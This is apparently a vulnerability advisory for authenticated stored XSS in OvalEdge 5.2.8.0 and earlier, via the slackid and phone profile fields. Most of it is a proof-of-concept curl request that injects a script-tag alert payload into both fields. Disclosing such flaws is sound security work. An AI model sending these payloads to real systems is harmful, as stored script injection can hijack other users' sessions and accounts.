Stored XSS (authenticated)
OvalEdge 5.2.8.0 and earlier is affected by multiple Stored XSS (AKA Persistent or Type II) vulnerabilities via a POST request to /profile/updateProfile via the slackid or phone parameters. Authentication is required.
Copy curl -k 'https://example.com/ovaledge/profile/updateProfile' \
-H 'Accept: */*' \
-H 'Accept-Language: en-US,en;q=0.9' \
-H 'Connection: keep-alive' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykZH2TqJk3RBgZVKN' \
-H 'Cookie: oe-loc=en; JSESSIONID=NzA2ZTg2YjUtYmE2OS00MTZiLTllZmItNTIzZGUxZmRmYjUy' \
-H 'Origin: https://example.com' \
-H 'Referer: https://example.com/ovaledge/' \
-H 'Sec-Fetch-Dest: empty' \
-H 'Sec-Fetch-Mode: cors' \
-H 'Sec-Fetch-Site: same-origin' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "macOS"' \
--data-raw $'------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="email"\r\n\r\[email protected] \r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="phone"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN--\r\n' \
--compressed